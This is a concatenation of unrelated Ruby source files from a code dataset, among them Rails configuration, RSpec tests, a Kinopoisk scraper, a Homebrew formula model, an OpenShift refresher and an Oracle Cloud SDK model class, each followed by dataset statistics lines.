# https://github.com/simplecov-ruby/simplecov#test-suite-names
SimpleCov.command_name "test:unit:mini"
| 36.264706 | 79 | 0.746959 |
ab92512915877daa820f87838fb428da5d970c06 | 265 | #!/usr/bin/ruby
class Poussin < Animal
def initialize
super(2, "Cuit cuit", "Poussin", "Titi")
end
def speak
super
@nb_call ||= 0
@nb_call += 1
get_sick if @nb_call >= 42
end
private
def get_sick
@sound = "Cuo cuo"
end
end
| 12.619048 | 44 | 0.584906 |
33ff7084e30df9f45eb6dc46846f0d940918a4f9 | 1,306 | require_relative 'active_tab'
module SharedProjectTab
include Spinach::DSL
include SharedActiveTab
step 'the active main tab should be Home' do
ensure_active_main_tab('Project')
end
step 'the active main tab should be Files' do
ensure_active_main_tab('Files')
end
step 'the active main tab should be Commits' do
ensure_active_main_tab('Commits')
end
step 'the active main tab should be Network' do
ensure_active_main_tab('Network')
end
step 'the active main tab should be Graphs' do
ensure_active_main_tab('Graphs')
end
step 'the active main tab should be Issues' do
ensure_active_main_tab('Issues')
end
step 'the active main tab should be Members' do
ensure_active_main_tab('Members')
end
step 'the active main tab should be Merge Requests' do
ensure_active_main_tab('Merge Requests')
end
step 'the active main tab should be Snippets' do
ensure_active_main_tab('Snippets')
end
step 'the active main tab should be Wiki' do
ensure_active_main_tab('Wiki')
end
step 'the active main tab should be Settings' do
page.within '.nav-sidebar' do
expect(page).to have_content('Go to project')
end
end
step 'the active main tab should be Activity' do
ensure_active_main_tab('Activity')
end
end
| 22.912281 | 56 | 0.726646 |
38ef3176df3311b58f87e9bbd5b1b1993a680ec1 | 601 | require_relative 'boot'
require 'rails/all'
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module FirstclimbSite
class Application < Rails::Application
# Initialize configuration defaults for originally generated Rails version.
config.load_defaults 5.1
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
end
end
| 31.631579 | 82 | 0.768719 |
ab455dedeb8089b886c26ceebbd7631752bd1a35 | 2,518 | # This code is free software; you can redistribute it and/or modify it under
# the terms of the new BSD License.
#
# Copyright (c) 2012-2017, Sebastian Staudt
class Formula
include Mongoid::Document
include Mongoid::Timestamps::Updated
field :_id, type: String, overwrite: true
field :aliases, type: Array
field :date, type: Time
field :description, type: String
field :devel_version, type: String
field :head_version, type: String
field :keg_only, type: Boolean, default: false
field :removed, type: Boolean, default: false
field :name, type: String
field :homepage, type: String
field :revision, type: Integer
field :stable_version, type: String
after_build :set_id
alias_method :to_param, :name
belongs_to :repository, validate: false
has_and_belongs_to_many :revisions, inverse_of: nil, validate: false, index: true
has_and_belongs_to_many :deps, class_name: self.to_s, inverse_of: :revdeps, validate: false, index: true
has_and_belongs_to_many :revdeps, class_name: self.to_s, inverse_of: :deps, validate: false, index: true
scope :letter, ->(letter) { where(name: /^#{letter}/) }
index( { repository_id: 1 }, { unique: false })
index( { name: 1 }, { unique: false })
def best_spec
if stable_version
:stable
elsif devel_version
:devel
elsif head_version
:head
else
nil
end
end
def dupe?
self.class.where(name: name).size > 1
end
def path
(repository.formula_path.nil? ? name : File.join(repository.formula_path, name)) + '.rb'
end
def raw_url
"https://raw.github.com/#{repository.name}/HEAD/#{path}"
end
def generate_history!
revisions.clear
repository.generate_formula_history self
end
def update_metadata(formula_info)
self.description = formula_info['desc']
self.homepage = formula_info['homepage']
self.keg_only = formula_info['keg_only']
self.stable_version = formula_info['versions']['stable']
self.devel_version = formula_info['versions']['devel']
self.head_version = formula_info['versions']['head']
self.revision = formula_info['revision']
self.deps = formula_info['dependencies'].map do |dep|
repository.formulae.find_by(name: dep) || Repository.core.formulae.find_by(name: dep)
end
end
def version
stable_version || devel_version || head_version
end
def versions
[ stable_version, devel_version, head_version ].compact
end
def set_id
self._id = "#{repository.name}/#{name}"
end
end
| 26.505263 | 106 | 0.702939 |
33f0dd6e1dca7ebc833c6deb4a81d52df2f02d1e | 1,950 | require 'fellowship'
RSpec.describe Fellowship do
it "has a version number" do
expect(Fellowship::VERSION).not_to be nil
end
it "finds the factorial of 5" do
expect(Fellowship::Fellowship.factorial(5)).to eq(120)
end
it "finds the factorial of 0" do
expect(Fellowship::Fellowship.factorial(0)).to eq(1)
end
it "deep copies 'hello'" do
expect(Fellowship::Fellowship.deep_copy('hello')).to eq('hello')
end
it "determines whether 2 is prime" do
expect(Fellowship::Fellowship.prime?(2)).to eq(true)
end
it "determines whether 3 is prime" do
expect(Fellowship::Fellowship.prime?(3)).to eq(true)
end
it "determines whether 1 is prime" do
expect(Fellowship::Fellowship.prime?(9)).to eq(false)
end
it "determines whether 1.0 is prime" do
expect(Fellowship::Fellowship.prime?(1.0)).to eq(false)
end
it "determines whether 2.0 is prime" do
expect(Fellowship::Fellowship.prime?(2.0)).to eq(true)
end
it "determines the second digit of 2345" do
expect(Fellowship::Fellowship.int_digit(2345,1)).to eq(3)
end
it "sorts people by age and name" do
people = [
{:name=>"Donald", :age=>8},
{:name=>"Angela", :age=>26},
{:name=>"Jake", :age=>34},
{:name=>"Brett", :age=>3},
{:name=>"Sunny", :age=>4},
{:name=>"Stacy", :age=>54},
{:name=>"Amber", :age=>53},
{:name=>"Adam", :age=>54},
{:name=>"Apsara", :age=>100},
{:name=>"Keith", :age=>3}
]
sorted_people = [
{:name=>"Brett", :age=>3},
{:name=>"Keith", :age=>3},
{:name=>"Sunny", :age=>4},
{:name=>"Donald", :age=>8},
{:name=>"Angela", :age=>26},
{:name=>"Jake", :age=>34},
{:name=>"Amber", :age=>53},
{:name=>"Adam", :age=>54},
{:name=>"Stacy", :age=>54},
{:name=>"Apsara", :age=>100}
]
expect(Fellowship::Fellowship.sort_hashes_by(people, :age, :name)).to eq(sorted_people)
end
end
| 27.083333 | 91 | 0.592308 |
62b4074f4dd0bd3a93c078334cf7cab817e219d9 | 1,117 | module ManageIQ::Providers
module Openshift
class ContainerManager::Refresher < ManageIQ::Providers::BaseManager::Refresher
include ::EmsRefresh::Refreshers::EmsRefresherMixin
include ManageIQ::Providers::Kubernetes::ContainerManager::RefresherMixin
KUBERNETES_EMS_TYPE = ManageIQ::Providers::Kubernetes::ContainerManager.ems_type
OPENSHIFT_ENTITIES = [
{:name => 'routes'}, {:name => 'projects'},
{:name => 'build_configs'}, {:name => 'builds'}
]
def parse_legacy_inventory(ems)
kube_entities = ems.with_provider_connection(:service => KUBERNETES_EMS_TYPE) do |kubeclient|
fetch_entities(kubeclient, KUBERNETES_ENTITIES)
end
openshift_entities = ems.with_provider_connection do |openshift_client|
fetch_entities(openshift_client, OPENSHIFT_ENTITIES)
end
entities = openshift_entities.merge(kube_entities)
EmsRefresh.log_inv_debug_trace(entities, "inv_hash:")
ManageIQ::Providers::Openshift::ContainerManager::RefreshParser.ems_inv_to_hashes(entities)
end
end
end
end
| 39.892857 | 101 | 0.713518 |
878f3ec2593cdca0b212b514570337465771d438 | 759 |
module Intrigue
module Ident
module Check
class WordpressWpFastestCache < Intrigue::Ident::Check::Base
def generate_checks(url)
[
{
:type => "fingerprint",
:category => "application",
:tags => ["Wordpress Plugin"],
:vendor =>"Wordpress",
:product =>"WP Fastest Cache",
:references => ["https://seclists.org/fulldisclosure/2019/Mar/17"],
:match_details =>"string in body",
:match_type => :content_body,
:match_content => /<!-- WP Fastest Cache file was created in/i,
:version => nil,
:paths => ["#{url}"],
:inference => false
}
]
end
end
end
end
end
| 25.3 | 79 | 0.504611 |
4a0e083d0632fb15062f0d9747ccca7582d4beac | 594 | module Closeio
class Client
module SmartView
def list_smart_views
get(smart_view_path)
end
def find_smart_view(id)
get(smart_view_path(id))
end
def create_smart_view(options = {})
post(smart_view_path, options)
end
def update_smart_view(id, options = {})
put(smart_view_path(id), options)
end
def delete_smart_view(id)
delete(smart_view_path(id))
end
private
def smart_view_path(id = nil)
id ? "saved_search/#{id}/" : 'saved_search/'
end
end
end
end
| 18.5625 | 52 | 0.597643 |
1db7d121b88c5ad9d3f4a60487bed41a002bef26 | 1,116 | # frozen_string_literal: true
# Copyright 2015-2017, the Linux Foundation, IDA, and the
# CII Best Practices badge contributors
# SPDX-License-Identifier: MIT
require 'test_helper'
load 'Rakefile'
class FeedTest < ActionDispatch::IntegrationTest
# Turn off transactional fixtures for this test since we are loading
# the fixtures database anyway. This will prevent the timestamp change
# from spilling into other tests.
self.use_transactional_tests = false
setup do
# Ensure the test db has its environment metadata set to test,
# otherwise tasks farther down will fail. New for Rails 5
Rake::Task['db:environment:set'].invoke
# Normalize time in order to match fixture file
travel_to Time.zone.parse('2015-03-01T12:00:00') do
ActiveRecord::Schema.verbose = false
Rake::Task['db:schema:load'].reenable
Rake::Task['db:schema:load'].invoke
Rake::Task['db:fixtures:load'].reenable
Rake::Task['db:fixtures:load'].invoke
end
end
test 'feed matches fixture file' do
get feed_path
assert_equal contents('feed.atom'), response.body
end
end
| 31.885714 | 72 | 0.727599 |
33d959f5ce59bbf570736c90e1a23145a0bb817a | 5,301 | #coding: UTF-8
module Kinopoisk
class Movie
attr_accessor :id, :url, :title
# New instance can be initialized with id(integer) or title(string). Second
# argument may also receive a string title to make it easier to
# differentiate Kinopoisk::Movie instances.
#
# Kinopoisk::Movie.new 277537
# Kinopoisk::Movie.new 'Dexter'
#
# Initializing by title would send a search request and return first match.
# Movie page request is made once and on the first access to a remote data.
#
def initialize(input, title=nil)
@id = input.is_a?(String) ? find_by_title(input) : input
@url = "http://www.kinopoisk.ru/film/#{id}/"
@title = title
end
# Returns an array of strings containing actor names
def actors
doc.search('#actorList ul li a').map{|n| n.text.gsub("\n",'').strip}
.delete_if{|text| text=='...'}
end
# Returns a string containing title in russian
def title
@title ||= doc.search('.moviename-big').xpath('text()').text.strip
end
# Returns an integer imdb rating vote count
def imdb_rating_count
doc.search('div.block_2 div:eq(2)').text.gsub(/.*\(/, '').gsub(/[ ()]/, '').to_i
end
# Returns a float imdb rating
def imdb_rating
doc.search('div.block_2 div:eq(2)').text[/\d.\d\d/].to_f
end
# Returns an integer release year
def year
doc.search("table.info a[href*='/m_act%5Byear%5D/']").text.to_i
end
# Returns an array of strings containing countries
def countries
doc.search("table.info a[href*='/m_act%5Bcountry%5D/']").map(&:text)
end
# Returns a string containing budget for the movie
def budget
doc.search("//td[text()='бюджет']/following-sibling::*//a").text
end
# Returns a string containing Russia box-office
def box_office_ru
doc.search("td#div_rus_box_td2 a").text
end
# Returns a string containing USA box-office
def box_office_us
doc.search("td#div_usa_box_td2 a").text
end
# Returns a string containing world box-office
def box_office_world
doc.search("td#div_world_box_td2 a").text
end
# Returns a url to a small sized poster
def poster
doc.search(".film-img-box img[itemprop='image']").first.attr 'src'
end
# Returns a string containing world premiere date
def premiere_world
doc.search('td#div_world_prem_td2 a:first').text
end
# Returns a string containing Russian premiere date
def premiere_ru
doc.search('td#div_rus_prem_td2 a:first').text
end
# Returns a float kinopoisk rating
def rating
doc.search('span.rating_ball').text.to_f
end
# Returns a url to a big sized poster
def poster_big
poster.gsub 'iphone/iphone360_', 'big/'
end
# Returns an integer length of the movie in minutes
def length
doc.search('td#runtime').text.to_i
end
# Returns a string containing title in english
def title_en
search_by_itemprop 'alternativeHeadline'
end
# Returns a string containing movie description
def description
search_by_itemprop 'description'
end
# Returns an integer kinopoisk rating vote count
def rating_count
search_by_itemprop('ratingCount').to_i
end
# Returns an array of strings containing director names
def directors
to_array search_by_itemprop 'director'
end
# Returns an array of strings containing producer names
def producers
to_array search_by_itemprop 'producer'
end
# Returns an array of strings containing composer names
def composers
to_array search_by_itemprop 'musicBy'
end
# Returns an array of strings containing genres
def genres
to_array search_by_itemprop 'genre'
end
# Returns an array of strings containing writer names
def writers
to_array search_by_text 'сценарий'
end
# Returns an array of strings containing operator names
def operators
to_array search_by_text 'оператор'
end
# Returns an array of strings containing art director names
def art_directors
to_array search_by_text 'художник'
end
# Returns an array of strings containing editor names
def editors
to_array search_by_text 'монтаж'
end
# Returns a string containing movie slogan
def slogan
search_by_text 'слоган'
end
# Returns a string containing minimal age
def minimal_age
search_by_text('возраст').strip
end
# Returns a string containing duration of the film
def duration
search_by_text('время').strip
end
private
def doc
@doc ||= Kinopoisk.parse url
end
# Kinopoisk has defined first=yes param to redirect to first result
# Return its id from location header
def find_by_title(title)
url = SEARCH_URL+"#{URI.escape(title)}&first=yes"
Kinopoisk.fetch(url).headers['Location'].to_s.match(/\/(\d*)\/$/)[1]
end
def search_by_itemprop(name)
doc.search("[itemprop=#{name}]").text
end
def search_by_text(name)
doc.search("//td[text()='#{name}']/following-sibling::*").text
end
def to_array(string)
string.gsub('...', '').split(', ')
end
end
end
| 26.638191 | 86 | 0.661762 |
394c41b4d7ca5358d76d0d73f83932621c20dbd4 | 278 | require 'mongoid/markdown'
module ChatEngine
class Message
include Mongoid::Document
include Mongoid::Markdown
field :from
field :sent, :default => Time.now
field :body, :markdown => true
validates_presence_of :body, :on => :create
end
end | 19.857143 | 47 | 0.669065 |
e82d95ab869070a1f1b65bfb6e1c2c4f53650eaa | 1,289 | # == Schema Information
#
# Table name: admin_users
#
# id :bigint(8) not null, primary key
# email :string(255) default(""), not null
# encrypted_password :string(255) default(""), not null
# reset_password_token :string(255)
# reset_password_sent_at :datetime
# remember_created_at :datetime
# sign_in_count :integer default(0), not null
# current_sign_in_at :datetime
# last_sign_in_at :datetime
# current_sign_in_ip :string(255)
# last_sign_in_ip :string(255)
# created_at :datetime not null
# updated_at :datetime not null
#
# Indexes
#
# index_admin_users_on_email (email) UNIQUE
# index_admin_users_on_reset_password_token (reset_password_token) UNIQUE
#
class AdminUser < ApplicationRecord
# Include default devise modules. Others available are:
# :confirmable, :lockable, :timeoutable and :omniauthable
devise :database_authenticatable,
:recoverable, :rememberable, :trackable, :validatable
before_update :check_user
def check_user
if Current.admin_user
unless Current.admin_user.id == self.id
errors.add :id, "不能修改其他管理员账号"
return false
end
end
end
end | 31.439024 | 75 | 0.650892 |
1dc4dd9bd29d9600097fcdefcf4c6b60c5ccc304 | 3,329 | #!/usr/bin/env rspec
require 'spec_helper'
require 'mcollective/application/plugin'
module MCollective
class Application
describe Plugin do
let(:ddl) { mock }
before do
@app = MCollective::Application::Plugin.new()
@app.configuration[:rpctemplate] = "rspec-helptemplate.erb"
end
describe "#doc_command" do
it "should display doc output for a plugin that exists when using 'plugin'" do
@app.configuration[:target] = "rspec"
PluginManager.stubs(:find).with(:agent, "ddl").returns(["rspec"])
PluginManager.stubs(:find).with(:aggregate, "ddl").returns([""])
PluginManager.stubs(:find).with(:data, "ddl").returns([""])
PluginManager.stubs(:find).with(:discovery, "ddl").returns([""])
PluginManager.stubs(:find).with(:validator, "ddl").returns([""])
PluginManager.stubs(:find).with(:connector, "ddl").returns([""])
@app.stubs(:load_plugin_ddl).with('rspec', :agent).returns(ddl)
ddl.expects(:help).with("rspec-helptemplate.erb").returns("agent_template")
@app.expects(:puts).with("agent_template")
@app.doc_command
end
it "should display doc output for a plugin that exists when using 'plugintype/plugin'" do
@app.configuration[:target] = "agent/rspec"
@app.stubs(:load_plugin_ddl).with(:rspec, "agent").returns(ddl)
ddl.expects(:help).with("rspec-helptemplate.erb").returns("agent_template")
@app.expects(:puts).with("agent_template")
@app.doc_command
end
it "should display a failure message for a plugin that doesn't exist when using 'plugin'" do
@app.configuration[:target] = "rspec"
PluginManager.stubs(:find).returns([""])
@app.expects(:abort).with("Could not find a plugin named 'rspec' in any supported plugin type").raises("test_error")
expect{
@app.doc_command
}.to raise_error "test_error"
end
it "should display a failure message for a plugin that doens't exist when using 'plugintype/plugin'" do
@app.configuration[:target] = "agent/rspec"
@app.expects(:load_plugin_ddl).with(:rspec, "agent").returns(nil)
@app.expects(:abort).with("Could not find a 'agent' plugin named 'rspec'").raises("test_error")
expect{
@app.doc_command
}.to raise_error "test_error"
end
it "should display a failure message if duplicate plugins are found" do
@app.configuration[:target] = "rspec"
PluginManager.stubs(:find).returns(["rspec"])
@app.stubs(:abort).with("Duplicate plugin name found, please specify a full path like agent/rpcutil").raises("test_error")
expect{
@app.doc_command
}.to raise_error "test_error"
end
it "should display a failure message for a plugintype that doens't exist" do
@app.configuration[:target] = "foo/rspec"
@app.stubs(:load_plugin_ddl).with(:rspec, "foo").returns(nil)
@app.stubs(:abort).with("Could not find a 'foo' plugin named 'rspec'").raises("test_error")
expect{
@app.doc_command
}.to raise_error "test_error"
end
end
end
end
end
| 40.108434 | 132 | 0.620306 |
1d3f71cfc631d1a7015f3a9a640f83cf2e112136 | 841 | $LOAD_PATH.unshift File.expand_path('lib', __dir__)
require 'stream/version'
Gem::Specification.new do |gem|
gem.name = 'stream-ruby'
gem.description = 'Ruby client for getstream.io service'
gem.version = Stream::VERSION
gem.platform = Gem::Platform::RUBY
gem.summary = 'A gem that provides a client interface for getstream.io'
gem.email = '[email protected]'
gem.homepage = 'http://github.com/GetStream/stream-ruby'
gem.authors = ['Tommaso Barbugli', 'Ian Douglas', 'Federico Ruggi']
gem.extra_rdoc_files = %w[README.md LICENSE]
gem.files = Dir['lib/**/*']
gem.license = 'BSD-3-Clause'
gem.required_ruby_version = '>=2.5.0'
gem.add_dependency 'faraday'
gem.add_dependency 'jwt'
gem.add_development_dependency 'rake'
gem.add_development_dependency 'rspec'
gem.add_development_dependency 'simplecov'
end
| 36.565217 | 73 | 0.73365 |
6a401187cbff6532a5483c51061b8f4ed49b5144 | 216 | # This migration comes from alchemy (originally 20150729151825)
class AddLinkTextToAlchemyEssenceFiles < ActiveRecord::Migration[4.2]
def change
add_column :alchemy_essence_files, :link_text, :string
end
end
| 30.857143 | 69 | 0.805556 |
b92d0ba51f5cd55cb4b24d452f65bfce15a41ae7 | 2,473 | class RemoveLocalAreas < ActiveRecord::Migration
def self.up
drop_table :areas
end
def self.down
create_table "areas", :force => true do |t|
t.string "country"
t.float "co2_price"
t.float "co2_percentage_free"
t.float "el_import_capacity"
t.float "el_export_capacity"
t.float "co2_emission_1990"
t.float "co2_emission_2009"
t.float "co2_emission_electricity_1990"
t.float "residences_roof_surface_available_for_pv"
t.float "coast_line"
t.float "offshore_suitable_for_wind"
t.float "onshore_suitable_for_wind"
t.float "areable_land"
t.float "available_land"
t.datetime "created_at"
t.datetime "updated_at"
t.float "land_available_for_solar"
t.float "km_per_car"
t.float "import_electricity_primary_demand_factor", :default => 1.82
t.float "export_electricity_primary_demand_factor", :default => 1.0
t.float "capacity_buffer_in_mj_s"
t.float "capacity_buffer_decentral_in_mj_s"
t.float "km_per_truck"
t.float "annual_infrastructure_cost_electricity"
t.float "number_of_residences"
t.float "number_of_inhabitants"
t.boolean "use_network_calculations"
t.boolean "has_coastline"
t.boolean "has_mountains"
t.boolean "has_lignite"
t.float "annual_infrastructure_cost_gas"
t.string "entity"
t.float "percentage_of_new_houses"
t.float "recirculation"
t.float "heat_recovery"
t.float "ventilation_rate"
t.float "market_share_daylight_control"
t.float "market_share_motion_detection"
t.float "buildings_heating_share_offices"
t.float "buildings_heating_share_schools"
t.float "buildings_heating_share_other"
t.float "buildings_roof_surface_available_for_pv"
t.float "insulation_level_existing_houses"
t.float "insulation_level_new_houses"
t.float "insulation_level_schools"
t.float "insulation_level_offices"
t.boolean "has_buildings"
t.boolean "has_agriculture", :default => true
t.integer "current_electricity_demand_in_mj", :limit => 8, :default => 1
t.boolean "has_solar_csp"
t.boolean "has_old_technologies"
t.integer "parent_id"
end
end
end
| 39.253968 | 90 | 0.648605 |
4a5d8dfbd919ab257473bcaadaed490c3182428e | 2,053 | require 'spec_helper'
describe "Analyzer" do
let(:test_data){ [
{
"profile" => {
"username"=>"aaa"
},
"stats" => {
"Ruby" => {"count"=>5, "star"=>0 },
"JavaScript" => { "count"=> 1, "star"=>10 }
}
},
{
"profile" => {
"username"=>"bbb"
},
"stats" => {
"Ruby" => {"count"=>5, "star"=>10 },
"C" => { "count"=> 10, "star"=>10 },
"JavaScript" => { "count"=> 9, "star"=>0 }
}
}
]}
let(:test_data2){ [
{
"profile" => {
"username"=>"aaa"
},
"stats" => {
"Ruby" => {"count"=>5, "star"=>0 },
"JavaScript" => { "count"=> 1, "star"=>10 }
}
},
{
"profile" => {
"username"=>"bbb"
},
"stats" => {
"Ruby" => {"count"=>1, "star"=>10 },
"C" => { "count"=> 10, "star"=>10 },
"JavaScript" => { "count"=> 6, "star"=>0 }
}
}
]}
it "calculate sum by language" do
p = Hubberlyzer::Analyzer.new(test_data)
sum = p.sum_by_language
puts sum.inspect
expect(sum["C"]["count"]).to eq(10)
expect(sum["Ruby"]["count"]).to eq(10)
expect(sum["JavaScript"]["count"]).to eq(10)
expect(sum["C"]["star"]).to eq(10)
expect(sum["Ruby"]["star"]).to eq(10)
expect(sum["JavaScript"]["star"]).to eq(10)
end
it "calculate member's contribution to a language" do
p = Hubberlyzer::Analyzer.new(test_data)
sum = p.member_contrib("Ruby", "star")
puts sum.inspect
expect(sum.length).to eq(2)
expect(sum[0]["profile"]["username"]).to eq("bbb")
expect(sum[1]["profile"]["username"]).to eq("aaa")
expect(sum[0]["star"]).to eq(10)
expect(sum[1]["star"]).to eq(0)
end
it "calculate top x language" do
p = Hubberlyzer::Analyzer.new(test_data2)
sum = p.top_language("count", 10)
puts sum.inspect
expect(sum.length).to eq(3)
expect(sum[0][0]).to eq("C")
expect(sum[1][0]).to eq("JavaScript")
expect(sum[2][0]).to eq("Ruby")
end
end | 23.597701 | 55 | 0.483195 |
189a6f07326a7966bc2810e6234ab8c8102c99fd | 11,608 | # Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
require 'date'
require_relative 'external_database_connector'
# rubocop:disable Lint/UnneededCopDisableDirective, Metrics/LineLength
module OCI
# An Oracle Cloud Infrastructure resource that uses the [Management Agent cloud service (MACS)](https://docs.cloud.oracle.com/iaas/management-agents/index.html) to connect to an external Oracle Database.
#
class Database::Models::ExternalMacsConnector < Database::Models::ExternalDatabaseConnector
# This attribute is required.
# @return [OCI::Database::Models::DatabaseConnectionString]
attr_accessor :connection_string
# This attribute is required.
# @return [OCI::Database::Models::DatabaseConnectionCredentials]
attr_accessor :connection_credentials
# **[Required]** The ID of the agent used for the
# {#create_external_database_connector_details create_external_database_connector_details}.
#
# @return [String]
attr_accessor :connector_agent_id
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
# rubocop:disable Style/SymbolLiteral
'compartment_id': :'compartmentId',
'freeform_tags': :'freeformTags',
'defined_tags': :'definedTags',
'display_name': :'displayName',
'id': :'id',
'lifecycle_state': :'lifecycleState',
'lifecycle_details': :'lifecycleDetails',
'time_created': :'timeCreated',
'connector_type': :'connectorType',
'external_database_id': :'externalDatabaseId',
'connection_status': :'connectionStatus',
'time_connection_status_last_updated': :'timeConnectionStatusLastUpdated',
'connection_string': :'connectionString',
'connection_credentials': :'connectionCredentials',
'connector_agent_id': :'connectorAgentId'
# rubocop:enable Style/SymbolLiteral
}
end
# Attribute type mapping.
def self.swagger_types
{
# rubocop:disable Style/SymbolLiteral
'compartment_id': :'String',
'freeform_tags': :'Hash<String, String>',
'defined_tags': :'Hash<String, Hash<String, Object>>',
'display_name': :'String',
'id': :'String',
'lifecycle_state': :'String',
'lifecycle_details': :'String',
'time_created': :'DateTime',
'connector_type': :'String',
'external_database_id': :'String',
'connection_status': :'String',
'time_connection_status_last_updated': :'DateTime',
'connection_string': :'OCI::Database::Models::DatabaseConnectionString',
'connection_credentials': :'OCI::Database::Models::DatabaseConnectionCredentials',
'connector_agent_id': :'String'
# rubocop:enable Style/SymbolLiteral
}
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:disable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
# @option attributes [String] :compartment_id The value to assign to the {OCI::Database::Models::ExternalDatabaseConnector#compartment_id #compartment_id} proprety
# @option attributes [Hash<String, String>] :freeform_tags The value to assign to the {OCI::Database::Models::ExternalDatabaseConnector#freeform_tags #freeform_tags} proprety
# @option attributes [Hash<String, Hash<String, Object>>] :defined_tags The value to assign to the {OCI::Database::Models::ExternalDatabaseConnector#defined_tags #defined_tags} proprety
# @option attributes [String] :display_name The value to assign to the {OCI::Database::Models::ExternalDatabaseConnector#display_name #display_name} proprety
# @option attributes [String] :id The value to assign to the {OCI::Database::Models::ExternalDatabaseConnector#id #id} proprety
# @option attributes [String] :lifecycle_state The value to assign to the {OCI::Database::Models::ExternalDatabaseConnector#lifecycle_state #lifecycle_state} proprety
# @option attributes [String] :lifecycle_details The value to assign to the {OCI::Database::Models::ExternalDatabaseConnector#lifecycle_details #lifecycle_details} proprety
# @option attributes [DateTime] :time_created The value to assign to the {OCI::Database::Models::ExternalDatabaseConnector#time_created #time_created} proprety
# @option attributes [String] :external_database_id The value to assign to the {OCI::Database::Models::ExternalDatabaseConnector#external_database_id #external_database_id} proprety
# @option attributes [String] :connection_status The value to assign to the {OCI::Database::Models::ExternalDatabaseConnector#connection_status #connection_status} proprety
# @option attributes [DateTime] :time_connection_status_last_updated The value to assign to the {OCI::Database::Models::ExternalDatabaseConnector#time_connection_status_last_updated #time_connection_status_last_updated} proprety
# @option attributes [OCI::Database::Models::DatabaseConnectionString] :connection_string The value to assign to the {#connection_string} property
# @option attributes [OCI::Database::Models::DatabaseConnectionCredentials] :connection_credentials The value to assign to the {#connection_credentials} property
# @option attributes [String] :connector_agent_id The value to assign to the {#connector_agent_id} property
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
attributes['connectorType'] = 'MACS'
super(attributes)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
self.connection_string = attributes[:'connectionString'] if attributes[:'connectionString']
raise 'You cannot provide both :connectionString and :connection_string' if attributes.key?(:'connectionString') && attributes.key?(:'connection_string')
self.connection_string = attributes[:'connection_string'] if attributes[:'connection_string']
self.connection_credentials = attributes[:'connectionCredentials'] if attributes[:'connectionCredentials']
raise 'You cannot provide both :connectionCredentials and :connection_credentials' if attributes.key?(:'connectionCredentials') && attributes.key?(:'connection_credentials')
self.connection_credentials = attributes[:'connection_credentials'] if attributes[:'connection_credentials']
self.connector_agent_id = attributes[:'connectorAgentId'] if attributes[:'connectorAgentId']
raise 'You cannot provide both :connectorAgentId and :connector_agent_id' if attributes.key?(:'connectorAgentId') && attributes.key?(:'connector_agent_id')
self.connector_agent_id = attributes[:'connector_agent_id'] if attributes[:'connector_agent_id']
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:enable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# Checks equality by comparing each attribute.
# @param [Object] other the other object to be compared
def ==(other)
return true if equal?(other)
self.class == other.class &&
compartment_id == other.compartment_id &&
freeform_tags == other.freeform_tags &&
defined_tags == other.defined_tags &&
display_name == other.display_name &&
id == other.id &&
lifecycle_state == other.lifecycle_state &&
lifecycle_details == other.lifecycle_details &&
time_created == other.time_created &&
connector_type == other.connector_type &&
external_database_id == other.external_database_id &&
connection_status == other.connection_status &&
time_connection_status_last_updated == other.time_connection_status_last_updated &&
connection_string == other.connection_string &&
connection_credentials == other.connection_credentials &&
connector_agent_id == other.connector_agent_id
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# @see the `==` method
# @param [Object] other the other object to be compared
def eql?(other)
self == other
end
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[compartment_id, freeform_tags, defined_tags, display_name, id, lifecycle_state, lifecycle_details, time_created, connector_type, external_database_id, connection_status, time_connection_status_last_updated, connection_string, connection_credentials, connector_agent_id].hash
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /^Array<(.*)>/i
# check to ensure the input is an array given that the the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
public_method("#{key}=").call(
attributes[self.class.attribute_map[key]]
.map { |v| OCI::Internal::Util.convert_to_type(Regexp.last_match(1), v) }
)
end
elsif !attributes[self.class.attribute_map[key]].nil?
public_method("#{key}=").call(
OCI::Internal::Util.convert_to_type(type, attributes[self.class.attribute_map[key]])
)
end
# or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = public_method(attr).call
next if value.nil? && !instance_variable_defined?("@#{attr}")
hash[param] = _to_hash(value)
end
hash
end
private
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
